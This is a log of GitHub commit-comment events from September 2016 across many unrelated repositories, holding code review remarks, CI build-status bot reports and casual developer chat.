{"id":"4577373838","type":"CommitCommentEvent","actor":{"login":"Fsu0413"},"repo":{"name":"Fsu0413/QSanguosha-For-Hegemony"},"payload":{"comment":{"id":19063301,"position":32,"line":0,"path":"gamelogiclib/src/structs.cpp","commit_id":"8e263ecaae721eacd5e4183cca617ece86923b50","created_at":"2016-09-17T05:07:12Z","updated_at":"2016-09-17T05:07:12Z","body":"逻辑对么"}},"created_at":"2016-09-17T05:07:12Z"}
{"id":"4577374967","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19063303,"position":null,"line":null,"path":null,"commit_id":"a19ddcc005bd09857724e451c8c241b5e1660b8e","created_at":"2016-09-17T05:08:13Z","updated_at":"2016-09-17T05:08:13Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (1783 of 1783 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a19ddcc005bd09857724e451c8c241b5e1660b8e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a19ddcc005bd09857724e451c8c241b5e1660b8e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-17T05:08:13Z"}
{"id":"4577376988","type":"CommitCommentEvent","actor":{"login":"MOVZX"},"repo":{"name":"khanfrd/android_kernel_xiaomi_kenzo"},"payload":{"comment":{"id":19063311,"position":5,"line":610,"path":"arch/arm64/mm/mmu.c","commit_id":"d9ded6702ac3e0f4be9928ffacb6f8d273db67ad","created_at":"2016-09-17T05:10:17Z","updated_at":"2016-09-17T05:10:17Z","body":"Oh well thanks mate for pointing me out, looks like I'm learning the old documentations :+1: "}},"created_at":"2016-09-17T05:10:17Z"}
{"id":"4577377194","type":"CommitCommentEvent","actor":{"login":"falkobuttler"},"repo":{"name":"narzate06/ios-exercises"},"payload":{"comment":{"id":19063312,"position":50,"line":68,"path":"SwiftExercises.playground/section-1.swift","commit_id":"6f76a5e26f4753c8628be8c66080a155972a43d1","created_at":"2016-09-17T05:10:31Z","updated_at":"2016-09-17T05:10:31Z","body":"The implementation of this method will look very similar to your solution in Objective-C. `characters` is an array. So to solve this, you create a new array, loop over the `characters` array, extract the favorite drink out of every element in the array within the loop and insert it into your new array."}},"created_at":"2016-09-17T05:10:31Z"}
{"id":"4577378185","type":"CommitCommentEvent","actor":{"login":"njmordetzky"},"repo":{"name":"njmordetzky/njmordetzky"},"payload":{"comment":{"id":19063316,"position":3,"line":3,"path":"css/0_sass_variables.scss","commit_id":"89878ce2e7caae267f6f616117de3ac67bcb63cc","created_at":"2016-09-17T05:11:27Z","updated_at":"2016-09-17T05:11:27Z","body":"looks like it came from an old ink typewriter"}},"created_at":"2016-09-17T05:11:27Z"}
{"id":"4577378417","type":"CommitCommentEvent","actor":{"login":"falkobuttler"},"repo":{"name":"narzate06/ios-exercises"},"payload":{"comment":{"id":19063317,"position":66,"line":98,"path":"SwiftExercises.playground/section-1.swift","commit_id":"6f76a5e26f4753c8628be8c66080a155972a43d1","created_at":"2016-09-17T05:11:41Z","updated_at":"2016-09-17T05:11:41Z","body":"The `emailFromUserDict` method has not been implemented yet. It is about extracting the email from the dictionary."}},"created_at":"2016-09-17T05:11:41Z"}
{"id":"4577379134","type":"CommitCommentEvent","actor":{"login":"falkobuttler"},"repo":{"name":"narzate06/ios-exercises"},"payload":{"comment":{"id":19063320,"position":70,"line":102,"path":"SwiftExercises.playground/section-1.swift","commit_id":"6f76a5e26f4753c8628be8c66080a155972a43d1","created_at":"2016-09-17T05:12:23Z","updated_at":"2016-09-17T05:12:23Z","body":"Please also implement the function to concatenate strings with semicolons and the closure task on the bottom."}},"created_at":"2016-09-17T05:12:23Z"}
{"id":"4577379197","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19063321,"position":null,"line":null,"path":null,"commit_id":"3a311556050ee70e71c43c3ca6bc86165174da77","created_at":"2016-09-17T05:12:26Z","updated_at":"2016-09-17T05:12:26Z","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/3a311556050ee70e71c43c3ca6bc86165174da77#commitcomment-19062968) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/c446686d038e02992f7b0a60490e04577069720f/daily_2016_9_17/report.md). cc @jrevels"}},"created_at":"2016-09-17T05:12:26Z"}
{"id":"4577379634","type":"CommitCommentEvent","actor":{"login":"youyi5617"},"repo":{"name":"youyi5617/homework0"},"payload":{"comment":{"id":19063322,"position":1,"line":10,"path":"README.md","commit_id":"5800e5ac17a7a917fd17337e260524a20c371b5e","created_at":"2016-09-17T05:12:51Z","updated_at":"2016-09-17T05:12:51Z","body":"\r\n  ## Brief self-introduction [max 500 words]\r\n"}},"created_at":"2016-09-17T05:12:51Z"}
{"id":"4577379779","type":"CommitCommentEvent","actor":{"login":"njmordetzky"},"repo":{"name":"njmordetzky/njmordetzky"},"payload":{"comment":{"id":19063323,"position":196,"line":29,"path":"css/1_header.scss","commit_id":"89878ce2e7caae267f6f616117de3ac67bcb63cc","created_at":"2016-09-17T05:13:00Z","updated_at":"2016-09-17T05:13:00Z","body":"how do you keep them in order though...?"}},"created_at":"2016-09-17T05:13:00Z"}
{"id":"4577380798","type":"CommitCommentEvent","actor":{"login":"XuXiangYang27"},"repo":{"name":"XuXiangYang27/learn"},"payload":{"comment":{"id":19063326,"position":5,"line":5,"path":"MyMap001.java","commit_id":"a17980a9272cac4aa133445716911d439f77b7c9","created_at":"2016-09-17T05:14:06Z","updated_at":"2016-09-17T05:14:06Z","body":"test"}},"created_at":"2016-09-17T05:14:06Z"}
{"id":"4577381336","type":"CommitCommentEvent","actor":{"login":"tunturn"},"repo":{"name":"tunturn/z3concept"},"payload":{"comment":{"id":19063328,"position":null,"line":null,"path":null,"commit_id":"903362eba5f686e26d0e08745c119b69053a47b0","created_at":"2016-09-17T05:14:40Z","updated_at":"2016-09-17T05:14:40Z","body":"Findings: This is not necessary, liblight can scale brightness properly.\r\nlights.msm8974.so from N preview works fine.\r\n "}},"created_at":"2016-09-17T05:14:40Z"}
{"id":"4577381706","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19063329,"position":null,"line":null,"path":null,"commit_id":"a19ddcc005bd09857724e451c8c241b5e1660b8e","created_at":"2016-09-17T05:15:04Z","updated_at":"2016-09-17T05:15:04Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a19ddcc005bd09857724e451c8c241b5e1660b8e-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-17T05:15:04Z"}
{"id":"4577382500","type":"CommitCommentEvent","actor":{"login":"sunflowe"},"repo":{"name":"sunflowe/supreme-succotash"},"payload":{"comment":{"id":19063330,"position":null,"line":null,"path":null,"commit_id":"eadc3ad870254957601ecf6589f7e03eceaf84f2","created_at":"2016-09-17T05:15:54Z","updated_at":"2016-09-17T05:15:54Z","body":"e"}},"created_at":"2016-09-17T05:15:54Z"}
{"id":"4577382801","type":"CommitCommentEvent","actor":{"login":"ljacqu"},"repo":{"name":"AuthMe/AuthMeReloaded"},"payload":{"comment":{"id":19063332,"position":null,"line":null,"path":null,"commit_id":"c1e90a8faff1b6398efa35f335d3b801099ed26b","created_at":"2016-09-17T05:16:14Z","updated_at":"2016-09-17T05:16:14Z","body":"@DNx5 Thanks for the hint!"}},"created_at":"2016-09-17T05:16:14Z"}
{"id":"4577383444","type":"CommitCommentEvent","actor":{"login":"tizzleh"},"repo":{"name":"tizzleh/Initial_0.0.0.1"},"payload":{"comment":{"id":19063338,"position":null,"line":null,"path":null,"commit_id":"bc184a9960aa90b2e4786a78f86e199d48311de5","created_at":"2016-09-17T05:16:55Z","updated_at":"2016-09-17T05:16:55Z","body":"TODO: Clean up, this needs refactoring before it turns to a spaghetti monster."}},"created_at":"2016-09-17T05:16:55Z"}
{"id":"4577383712","type":"CommitCommentEvent","actor":{"login":"natukikazemizo"},"repo":{"name":"natukikazemizo/sedna"},"payload":{"comment":{"id":19063339,"position":null,"line":null,"path":null,"commit_id":"c0d16350baea73d53f89ba9abbabaae1bba0785b","created_at":"2016-09-17T05:17:16Z","updated_at":"2016-09-17T05:17:16Z","body":"## 目的\r\n- Blenderファイル Sedona.blendの履歴付き管理\r\n\r\n## 現状\r\n- Readme.txtのみ上げてます。\r\n\r\n> .blendファイルはサイズが大きいうえに、差分がわかりにくい\r\n（しかも量が多いし変更した場所も分散している）ので、\r\n今は上げていません。\r\n\r\n## その他\r\n- 特になし \r\n\r\n"}},"created_at":"2016-09-17T05:17:16Z"}
{"id":"4577383830","type":"CommitCommentEvent","actor":{"login":"natukikazemizo"},"repo":{"name":"natukikazemizo/sedna"},"payload":{"comment":{"id":19063340,"position":null,"line":null,"path":null,"commit_id":"c0d16350baea73d53f89ba9abbabaae1bba0785b","created_at":"2016-09-17T05:17:24Z","updated_at":"2016-09-17T05:17:24Z","body":"本格運用開始"}},"created_at":"2016-09-17T05:17:24Z"}
{"id":"4577385282","type":"CommitCommentEvent","actor":{"login":"njmordetzky"},"repo":{"name":"njmordetzky/njmordetzky"},"payload":{"comment":{"id":19063341,"position":189,"line":22,"path":"css/1_header.scss","commit_id":"89878ce2e7caae267f6f616117de3ac67bcb63cc","created_at":"2016-09-17T05:18:54Z","updated_at":"2016-09-17T05:18:54Z","body":"okay. changed them"}},"created_at":"2016-09-17T05:18:54Z"}
{"id":"4577385730","type":"CommitCommentEvent","actor":{"login":"SubJunk"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19063342,"position":null,"line":null,"path":null,"commit_id":"50315f59da4b448864730f65f730d4e8fe34e08d","created_at":"2016-09-17T05:19:22Z","updated_at":"2016-09-17T05:19:22Z","body":"@Nadahar nice one fixing the build. What do the `RendererConfiguration` changes have to do with it?"}},"created_at":"2016-09-17T05:19:22Z"}
{"id":"4577386361","type":"CommitCommentEvent","actor":{"login":"ReewassSquared"},"repo":{"name":"swangboy55/3DEngine"},"payload":{"comment":{"id":19063346,"position":null,"line":null,"path":null,"commit_id":"3513799cb600aa107c693e56383b619092fe4ce6","created_at":"2016-09-17T05:20:01Z","updated_at":"2016-09-17T05:20:01Z","body":"Yo Add me to the repository. Also the collision engine/system/whatever you want to call it is not as bad as I thought it was going to be. Also, why are you using pure virtuals in your headers? Not going to judge too much; everyone has their own style. So, what do you want me to learn/prerequisites and concepts you want me to understand before beginning to start developing some src for the engine?"}},"created_at":"2016-09-17T05:20:01Z"}
{"id":"4577386372","type":"CommitCommentEvent","actor":{"login":"Xyene"},"repo":{"name":"DMOJ/site"},"payload":{"comment":{"id":19063347,"position":null,"line":null,"path":null,"commit_id":"03fe2656814145435e524ea338cfe8dd0f264f74","created_at":"2016-09-17T05:20:01Z","updated_at":"2016-09-17T05:20:01Z","body":"\"No idea, why would someone want to do such a thing?\""}},"created_at":"2016-09-17T05:20:01Z"}
{"id":"4577386484","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19063348,"position":null,"line":null,"path":null,"commit_id":"53ae2c8702fe6eb845071710683d6bc9c505c0e4","created_at":"2016-09-17T05:20:09Z","updated_at":"2016-09-17T05:20:09Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: Tests Failed (1192 of 1765 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-53ae2c8702fe6eb845071710683d6bc9c505c0e4-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-53ae2c8702fe6eb845071710683d6bc9c505c0e4-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-67.54%25-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-53ae2c8702fe6eb845071710683d6bc9c505c0e4-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.69%25-red.svg)</a>\n"}},"created_at":"2016-09-17T05:20:09Z"}
{"id":"4577387166","type":"CommitCommentEvent","actor":{"login":"ReewassSquared"},"repo":{"name":"swangboy55/3DEngine"},"payload":{"comment":{"id":19063350,"position":null,"line":null,"path":null,"commit_id":"3513799cb600aa107c693e56383b619092fe4ce6","created_at":"2016-09-17T05:20:47Z","updated_at":"2016-09-17T05:20:47Z","body":"Sorry this is coming out now; been busy this entire week. Started learning some OpenGL and I am assuming we are also using GLUT/GLEW."}},"created_at":"2016-09-17T05:20:47Z"}
{"id":"4577387402","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19063351,"position":null,"line":null,"path":null,"commit_id":"53ae2c8702fe6eb845071710683d6bc9c505c0e4","created_at":"2016-09-17T05:20:59Z","updated_at":"2016-09-17T05:20:59Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-53ae2c8702fe6eb845071710683d6bc9c505c0e4-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-17T05:20:59Z"}
{"id":"4577387643","type":"CommitCommentEvent","actor":{"login":"timiblossom"},"repo":{"name":"Netflix/dyno"},"payload":{"comment":{"id":19063352,"position":55,"line":196,"path":"dyno-jedis/src/main/java/com/netflix/dyno/jedis/DynoDualWriterClient.java","commit_id":"439497c496b535a8dab2f37866dcc3bc01ad2d5c","created_at":"2016-09-17T05:21:12Z","updated_at":"2016-09-17T05:21:12Z","body":"Sorry for a late comment.  However, it appears that there is no catch in the case of failures in sending writes to the new cluster.  This is like a fire and forget on writing data to the new cluster."}},"created_at":"2016-09-17T05:21:12Z"}
{"id":"4577389018","type":"CommitCommentEvent","actor":{"login":"njmordetzky"},"repo":{"name":"njmordetzky/njmordetzky"},"payload":{"comment":{"id":19063354,"position":205,"line":38,"path":"css/1_header.scss","commit_id":"89878ce2e7caae267f6f616117de3ac67bcb63cc","created_at":"2016-09-17T05:22:30Z","updated_at":"2016-09-17T05:22:30Z","body":"should i get rid of these numbers too? -no numbers ever...? any suggestions for naming these sorts of elements?"}},"created_at":"2016-09-17T05:22:30Z"}
{"id":"4577390840","type":"CommitCommentEvent","actor":{"login":"jotpe"},"repo":{"name":"WhisperSystems/libsignal-service-java"},"payload":{"comment":{"id":19063358,"position":null,"line":null,"path":null,"commit_id":"8df830d052c092dd246ffb41aaff422dea7bfb50","created_at":"2016-09-17T05:24:30Z","updated_at":"2016-09-17T05:24:30Z","body":"Why did you replace Arrays.equals(byte[],byte[]) with MessageDiggest.isEqual(byte[],byte[]) ?"}},"created_at":"2016-09-17T05:24:30Z"}
{"id":"4577391590","type":"CommitCommentEvent","actor":{"login":"ReewassSquared"},"repo":{"name":"swangboy55/3DEngine"},"payload":{"comment":{"id":19063360,"position":null,"line":null,"path":null,"commit_id":"3513799cb600aa107c693e56383b619092fe4ce6","created_at":"2016-09-17T05:25:15Z","updated_at":"2016-09-17T05:25:15Z","body":"Wow, those are pretty much the same thing. please do not roast me on how terrible I am with this (pretty much new with this)."}},"created_at":"2016-09-17T05:25:15Z"}
{"id":"4577392670","type":"CommitCommentEvent","actor":{"login":"aamir-shaikh"},"repo":{"name":"Dipesh-Reen/RPSLS"},"payload":{"comment":{"id":19063363,"position":null,"line":null,"path":null,"commit_id":"597481279d88587e00ff488de6acebfc06501632","created_at":"2016-09-17T05:26:20Z","updated_at":"2016-09-17T05:26:20Z","body":"haha\n\nOn Fri, Sep 16, 2016 at 4:26 AM, Debojeet Chatterjee <\nnotifications@github.com> wrote:\n\n> What a contri bro! 👍 💯\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Dipesh-Reen/RPSLS/commit/597481279d88587e00ff488de6acebfc06501632#commitcomment-19052667>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ASdiIW1ABLuLASJleI3EF54QFQUlscMgks5qqnzOgaJpZM4J-14G>\n> .\n>\n"}},"created_at":"2016-09-17T05:26:20Z"}
{"id":"4577397176","type":"CommitCommentEvent","actor":{"login":"DanielShlomo"},"repo":{"name":"DanielShlomo/Duckuino"},"payload":{"comment":{"id":19063389,"position":null,"line":null,"path":null,"commit_id":"fd8c1fbd01f163c7a05f2a88cdf9c502a755a6b1","created_at":"2016-09-17T05:30:45Z","updated_at":"2016-09-17T05:30:45Z","body":"UPDATE:\r\nYou should switch to my compiler.\r\nNow it support REPLAY/REPEAT, Key Combos and Mouse control (which makes it better than an original Rubber Ducky)."}},"created_at":"2016-09-17T05:30:45Z"}
{"id":"4577399679","type":"CommitCommentEvent","actor":{"login":"bjfish"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19063396,"position":null,"line":null,"path":null,"commit_id":"41e28fd827c259fc5f81697ba98a3f4af5561526","created_at":"2016-09-17T05:33:17Z","updated_at":"2016-09-17T05:33:17Z","body":"@chrisseaton Is this something you could reuse for the C API stuff?  \r\n\r\nI'm not sure if it matters to the C-API that we do the fixnum lowering (long -> int).\r\n\r\nPlease review when you can if there are any concerns: @nirvdrum @eregon "}},"created_at":"2016-09-17T05:33:17Z"}
{"id":"4577400290","type":"CommitCommentEvent","actor":{"login":"neilgibeaut"},"repo":{"name":"neilgibeaut/BandoCat-Transcription"},"payload":{"comment":{"id":19063398,"position":null,"line":null,"path":null,"commit_id":"16f62f2e6924c78c84f76ae0b21558243f3ae3cc","created_at":"2016-09-17T05:33:53Z","updated_at":"2016-09-17T05:33:53Z","body":"I'm confused with this change Juan, I would love to know the reasoning behind it. I have plenty of free time let me know of any features that might want to be added ill make a pull for it. "}},"created_at":"2016-09-17T05:33:53Z"}
{"id":"4577404365","type":"CommitCommentEvent","actor":{"login":"Sacha0"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19063411,"position":null,"line":null,"path":null,"commit_id":"3a311556050ee70e71c43c3ca6bc86165174da77","created_at":"2016-09-17T05:37:48Z","updated_at":"2016-09-17T05:37:48Z","body":"Nanosoldier indicates widespread memory regressions?"}},"created_at":"2016-09-17T05:37:48Z"}
{"id":"4577405743","type":"CommitCommentEvent","actor":{"login":"HotelCalifornia"},"repo":{"name":"purduesigbots/pros-atom"},"payload":{"comment":{"id":19063413,"position":null,"line":null,"path":null,"commit_id":"b4111ff93b1dc2343505b755f0ee15bad4f004cd","created_at":"2016-09-17T05:39:11Z","updated_at":"2016-09-17T05:39:11Z","body":"Made me do this after resetting the first commit with the correct user information...?\r\n*shrug*"}},"created_at":"2016-09-17T05:39:11Z"}
{"id":"4577410631","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"tsl0922/ttyd"},"payload":{"comment":{"id":19063419,"position":39,"line":39,"path":"utils.c","commit_id":"76a8b864156274a4da8662dec3dbcdf0919c283b","created_at":"2016-09-17T05:43:54Z","updated_at":"2016-09-17T05:43:54Z","body":"[This null pointer check is unnecessary](https://stackoverflow.com/questions/18775608/free-a-null-pointer-anyway-or-check-first \"Free a null pointer anyway or check first?\"), isn't it?"}},"created_at":"2016-09-17T05:43:54Z"}
{"id":"4577410813","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19063420,"position":null,"line":null,"path":null,"commit_id":"a19ddcc005bd09857724e451c8c241b5e1660b8e","created_at":"2016-09-17T05:44:05Z","updated_at":"2016-09-17T05:44:05Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1192 of 1192 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a19ddcc005bd09857724e451c8c241b5e1660b8e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a19ddcc005bd09857724e451c8c241b5e1660b8e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a19ddcc005bd09857724e451c8c241b5e1660b8e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.11%25-green.svg)</a>\n"}},"created_at":"2016-09-17T05:44:05Z"}
{"id":"4577411609","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19063421,"position":null,"line":null,"path":null,"commit_id":"a19ddcc005bd09857724e451c8c241b5e1660b8e","created_at":"2016-09-17T05:44:55Z","updated_at":"2016-09-17T05:44:55Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a19ddcc005bd09857724e451c8c241b5e1660b8e-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-17T05:44:55Z"}
{"id":"4577411684","type":"CommitCommentEvent","actor":{"login":"imcaffrey"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19063422,"position":null,"line":null,"path":null,"commit_id":"190fa5df2ea5e7103758134821c4cb72933719d5","created_at":"2016-09-17T05:44:59Z","updated_at":"2016-09-17T05:44:59Z","body":"为什么windows.zip没有移入hosttools呢（思考熊"}},"created_at":"2016-09-17T05:44:59Z"}
{"id":"4577412182","type":"CommitCommentEvent","actor":{"login":"mikermcneil"},"repo":{"name":"node-machine/machine"},"payload":{"comment":{"id":19063423,"position":20,"line":104,"path":"lib/intercept-exit-callbacks.js","commit_id":"54a0fa6875169b8572853a1dc05069da267e2d89","created_at":"2016-09-17T05:45:28Z","updated_at":"2016-09-17T05:45:28Z","body":"Note: we don't seem to be clearing the spinlock here"}},"created_at":"2016-09-17T05:45:28Z"}
{"id":"4577412794","type":"CommitCommentEvent","actor":{"login":"imsauravsingh"},"repo":{"name":"imsauravsingh/homeo"},"payload":{"comment":{"id":19063424,"position":null,"line":null,"path":null,"commit_id":"e11fe83e4053cfb9112a8daf53c83651f9028ead","created_at":"2016-09-17T05:46:02Z","updated_at":"2016-09-17T05:46:02Z","body":"merge"}},"created_at":"2016-09-17T05:46:02Z"}
{"id":"4577413510","type":"CommitCommentEvent","actor":{"login":"Too-Naive"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19063428,"position":null,"line":null,"path":null,"commit_id":"190fa5df2ea5e7103758134821c4cb72933719d5","created_at":"2016-09-17T05:46:39Z","updated_at":"2016-09-17T05:46:39Z","body":"移入了啊  难道 您不知道 有 伸手党 吗\r\n\r\n\r\n\r\nSent from my Mi phone\r\nOn SCaffrey <notifications@github.com>, Sep 17, 2016 13:45 wrote:\r\n\r\n为什么windows.zip没有移入hosttools呢（思考熊\r\n\r\n—\r\nYou are receiving this because you authored the thread.\r\nReply to this email directly, view it on GitHub<https://github.com/racaljk/hosts/commit/190fa5df2ea5e7103758134821c4cb72933719d5#commitcomment-19063422>, or mute the thread<https://github.com/notifications/unsubscribe-auth/APu4HxjbyYfaqfAYqeNKs1r9lfIz5yvwks5qq36BgaJpZM4J_hF0>.\r\n"}},"created_at":"2016-09-17T05:46:39Z"}
{"id":"4577414706","type":"CommitCommentEvent","actor":{"login":"tsl0922"},"repo":{"name":"tsl0922/ttyd"},"payload":{"comment":{"id":19063431,"position":39,"line":39,"path":"utils.c","commit_id":"76a8b864156274a4da8662dec3dbcdf0919c283b","created_at":"2016-09-17T05:47:53Z","updated_at":"2016-09-17T05:47:53Z","body":"Yes, but I may cross compile ttyd to some embedded platforms like wireless routers (openwrt), maybe it is needed."}},"created_at":"2016-09-17T05:47:53Z"}
{"id":"4577419616","type":"CommitCommentEvent","actor":{"login":"gabizou"},"repo":{"name":"SpongePowered/SpongeCommon"},"payload":{"comment":{"id":19063439,"position":null,"line":null,"path":null,"commit_id":"f2f6d73dc715323e6b86eced9f1cec21e2698d26","created_at":"2016-09-17T05:52:47Z","updated_at":"2016-09-17T05:52:47Z","body":"Very good commit. Thanks for resolving that @Aaron1011 :)"}},"created_at":"2016-09-17T05:52:47Z"}
{"id":"4577422267","type":"CommitCommentEvent","actor":{"login":"njmordetzky"},"repo":{"name":"njmordetzky/njmordetzky"},"payload":{"comment":{"id":19063442,"position":312,"line":145,"path":"css/1_header.scss","commit_id":"89878ce2e7caae267f6f616117de3ac67bcb63cc","created_at":"2016-09-17T05:55:21Z","updated_at":"2016-09-17T05:55:21Z","body":"done. \r\n"}},"created_at":"2016-09-17T05:55:21Z"}
{"id":"4577422681","type":"CommitCommentEvent","actor":{"login":"njmordetzky"},"repo":{"name":"njmordetzky/njmordetzky"},"payload":{"comment":{"id":19063443,"position":null,"line":null,"path":null,"commit_id":"89878ce2e7caae267f6f616117de3ac67bcb63cc","created_at":"2016-09-17T05:55:44Z","updated_at":"2016-09-17T05:55:44Z","body":"thanks for the encouragement"}},"created_at":"2016-09-17T05:55:44Z"}
{"id":"4577429201","type":"CommitCommentEvent","actor":{"login":"dreampiggy"},"repo":{"name":"Rinnegatamante/rinCheat"},"payload":{"comment":{"id":19063483,"position":null,"line":null,"path":null,"commit_id":"d002a7aa807bd1efca4b939453c6d60f33276a43","created_at":"2016-09-17T06:01:30Z","updated_at":"2016-09-17T06:01:30Z","body":"Pls, Don't point to 'China', it's zCheat's author's fault. Chinese's developer not all that who do not obey the licence"}},"created_at":"2016-09-17T06:01:30Z"}
{"id":"4577433163","type":"CommitCommentEvent","actor":{"login":"mcostalba"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19063498,"position":null,"line":null,"path":null,"commit_id":"ee719dbb55f5d6216b3f4b6a73b1d9bbfd50ea03","created_at":"2016-09-17T06:04:03Z","updated_at":"2016-09-17T06:04:03Z","body":"@pb00068 why not? Eventually start the LTC and if it takes too long I will stop it.\r\n\r\nAlso please, drop Bitboard defensive and replace its definition in the only place where it is needed: it will be faster and also more clear.\r\n"}},"created_at":"2016-09-17T06:04:03Z"}
{"id":"4577434851","type":"CommitCommentEvent","actor":{"login":"iwean"},"repo":{"name":"Necrobot-Private/NecroBot"},"payload":{"comment":{"id":19063504,"position":null,"line":null,"path":null,"commit_id":"56871421d8694a0f127158dbdad96539e3a4c7d9","created_at":"2016-09-17T06:05:28Z","updated_at":"2016-09-17T06:05:28Z","body":"(y)"}},"created_at":"2016-09-17T06:05:28Z"}
{"id":"4577436969","type":"CommitCommentEvent","actor":{"login":"T-X"},"repo":{"name":"popcornmix/omxplayer"},"payload":{"comment":{"id":19063509,"position":null,"line":null,"path":null,"commit_id":"c84083d15cbd757895025b2cc9fd902b97e3cb8a","created_at":"2016-09-17T06:07:27Z","updated_at":"2016-09-17T06:07:27Z","body":"This commit is awesome, thanks a lot @fabled! I'm finally able to use my Bluetooth headset via an Odroid-W (pi-zero-like) through \"-o alsa:pulse\" (as bluez decided to drop their alsa support and go all for pulseaudio in v5...).\r\n\r\nBy the way, speaking of pulseaudio, does anyone know whether someone is already working on direct pulseaudio support? For some 720p videos omxplayer over \"-o alsa:pulse\" sounds a little choppy for me (a little better with \"--threshold 15\", but still noticeable). 720p with HDMI audio with omxplayer output works perfectly, so I guess \"-o alsa:pulse\" might just have too many buffers chained together. At least too many for this poor, tiny, single core ARM. (So if anyone knows of a direct \"omxplayer -o pulse\" implementation then please let me know :-) )"}},"created_at":"2016-09-17T06:07:27Z"}
{"id":"4577437520","type":"CommitCommentEvent","actor":{"login":"PierceAndy"},"repo":{"name":"nus-cs2103-AY1617S1/addressbook-level3"},"payload":{"comment":{"id":19063511,"position":7,"line":52,"path":"doc/DeveloperGuide.md","commit_id":"b93c7250babb4caef9f0830fff176a893320d9f8","created_at":"2016-09-17T06:07:58Z","updated_at":"2016-09-17T06:07:58Z","body":"If the benefit is obvious, you don't have to include it (or in this case, repeat your previous statement). "}},"created_at":"2016-09-17T06:07:58Z"}
